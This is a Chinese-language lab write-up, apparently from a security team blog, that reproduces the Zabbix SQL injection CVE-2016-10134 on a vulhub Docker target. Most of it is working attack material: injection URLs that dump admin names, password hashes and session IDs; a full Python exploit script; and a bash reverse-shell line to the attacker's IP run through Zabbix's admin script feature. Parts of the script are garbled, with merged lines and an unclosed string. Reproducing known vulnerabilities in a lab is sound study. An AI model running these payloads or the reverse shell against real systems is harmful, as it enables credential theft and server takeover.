Zabbix sql注入漏洞复现(CVE-2016-10134)
Posted Tide安全团队
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Zabbix sql注入漏洞复现(CVE-2016-10134)相关的知识,希望对你有一定的参考价值。
一、Zabbix简介
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。
zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。
zabbix由2部分构成,zabbix server与可选组件zabbix agent。
zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X等平台上。
二、环境搭建
漏洞简述:
zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者通过未授权进入zabbix管理系统,进入后台使用script等功能直接获取zabbix服务器的操作系统权限。
环境说明:
攻击机IP:192.168.92.133
靶机IP:192.168.92.132
在靶机中进行环境搭建:
启动docker:
systemctl start docker
下载vulhub:
git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/c40903718fe042779483eb011fbbb8a9.jpg)
启动容器: docker-compose up -d
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/3dd550342fde4d57988bb15aeedf79cd.jpg)
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/f4da2aab1e4e4bf0ab07fdc89fc646a3.jpg)
如果需要复现后面的getshell的话需要在靶机的配置文件
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/cec13908df334993bc9afd7cf2a40082.jpg)
docker restart d46b9dab7152
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/eb84b74e390441e9a161ef462269e390.jpg)
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/2b6e915463704cd49edc92643c86f372.jpg)
三、漏洞复现
攻击机已知靶机ip,且靶机系统未关闭默认开启guest账户登陆
访问http://192.168.92.132:8080,用账号guest(密码为空)登
陆游客账户
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/a928d2d7abac488ba5123c0832629610.jpg)
登录后,查看Cookie中的zbx_sessionid,复制后16位字符:
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/e74615ea3449403e86b5873f6de23ae2.jpg)
将这16个字符作为sid的值,访问
http://192.168.92.132:8080/latest.php?output=ajax&sid= d28cedd32c7703be&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
可见成功注入
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/7e80dd88cc48438cb94c12b7c611260c.jpg)
在攻击机访问的zabbix的地址后面加上如下url:
http://192.168.92.132:8080/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2%273297&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/17b882537fe4472c8badcfc6d9c3b03d.jpg)
输出结果,若包含:You have an error in your SQL syntax;表示漏洞存在。
http://192.168.92.132:8080/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=profileldx2=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,name,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17
获取密码hash
http://192.168.92.132:8080/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=profileldx2=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,passwd,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17
也可使用以下链接直接获取用户名及密码hash
http://192.168.92.132:8080/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471054088083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,(select%20concat(name,0x3a,passwd)%20from%20%20users%20limit%200,1),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&updateProfile=true&screenitemid=&period=3600&stime=20170813040734&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/41dc8bd7397f4f22947f80c7a354d6e6.jpg)
http://192.168.92.132:8080/jsrpc.php?id=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=profileldx2=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,sessionid,0x7e)%20as%20char),0x7e))%20from%20zabbix.sessions%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Date: 2016/8/18
# Modified by: Jamin Zhang
import urllib2
import sys, os
import re
def deteck_Sql():
u'检查是否存在 SQL 注入'
payload = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(url + payload, timeout=10).read()
except Exception, msg:
print msg else:
key_reg = re.compile(r"INSERTs*INTOs*profiles")
if key_reg.findall(response):
return Truedef sql_Inject(sql): u'
获取特定sql语句内容'
payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(payload, timeout=10).read() except Exception, msg: print msg
else:
result_reg = re.compile(r"Duplicates*entrys*'~(.+?)~1")
results = result_reg.findall(response)
if results:
return results[0]
if __name__ == '__main__':
# os.system(['clear', 'cls'][os.name == 'nt']) print '+' + '-' * 60 + '+'
print u' Python Zabbix < 3.0.4 SQL 注入 Exploit'
print ' Origin Author: http://www.waitalone.cn/' print ' Modified by: Jamin Zhang'
print ' Date: 2016-08-18'
print '+' + '-' * 60 + '+'
if len(sys.argv) != 2:
print u'用法: ' + os.path.basename(sys.argv[0]) + u' [Zabbix Server Web 后台 URL]'
print u'实例: ' + os.path.basename(sys.argv[0]) + ' http://jaminzhang.github.io'
sys.exit()
url = sys.argv[1]
if url[-1] != '/': url += '/' passwd_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
session_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
if deteck_Sql():
print u'Zabbix 存在 SQL 注入漏洞!'
print u'管理员 用户名密码:%s' % sql_Inject(passwd_sql)
print u'管理员 Session_id:%s' % sql_Inject(session_sql) else:
print u'Zabbix 不存在 SQL 注入漏洞!
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/11b79f153375485c9b26deedced103bd.jpg)
在python2.7环境下运行该脚本
Python 1.py http://1921.168.92.132:8080
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/f58c15574b684220ae882ad6627168ff.jpg)
管理员用户名密码:
管理员Session_id:
使用somd5破解用户名密码字段:
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/871407a3ca7c4b319edd948db49094b8.jpg)
在登录页使用获取到的账户密码直接登录或者Burp抓包更换sessionid后刷新登录页进入管理员后台
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/886c47af169544c79891c0e59df156ba.jpg)
四、后台Get shell
尝试利用后台script功能获取其操作系统权限
在Administration页面的scrpit功能栏创建script
如果是实战渗透的话,我们这里加一个bash命令的反弹shell就可以
bash -i >& /dev/tcp/192.168.92.133/2333 0>&1在此直接添加env查看环境变量
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/42194b5492554699b7dc2c0b859ba3ca.jpg)
保存创建的script后依次点击Monitroing-Latest data,选择Host groups的select,全选
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/952c11ae8d00498595f52a50d81e88d0.jpg)
点击Fliter后鼠标右击Zabbix server,选择hacker运行后即可
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/e281dd3d878b48fd8088109922ea16cf.jpg)
五、参考链接
https://blog.csdn.net/qq_43645782/article/details/106588179
https://xz.aliyun.com/t/6874vulhub/zabbix/CVE-2016-10134atmaster·vulhub/vulhub·GitHub
https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
E
N
D
关
于
我
们
Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。
![Zabbix sql注入漏洞复现(CVE-2016-10134)](https://image.cha138.com/20210411/566deb57e4d04de6a34bed96ad5341ef.jpg)
我知道你在看哟
以上是关于Zabbix sql注入漏洞复现(CVE-2016-10134)的主要内容,如果未能解决你的问题,请参考以下文章
zabbix-latest.php-SQL注入漏洞(CVE-2016-10134)
zabbix-latest.php-SQL注入漏洞(CVE-2016-10134)
Zabbix latest.php SQL注入漏洞(CVE-2016-10134)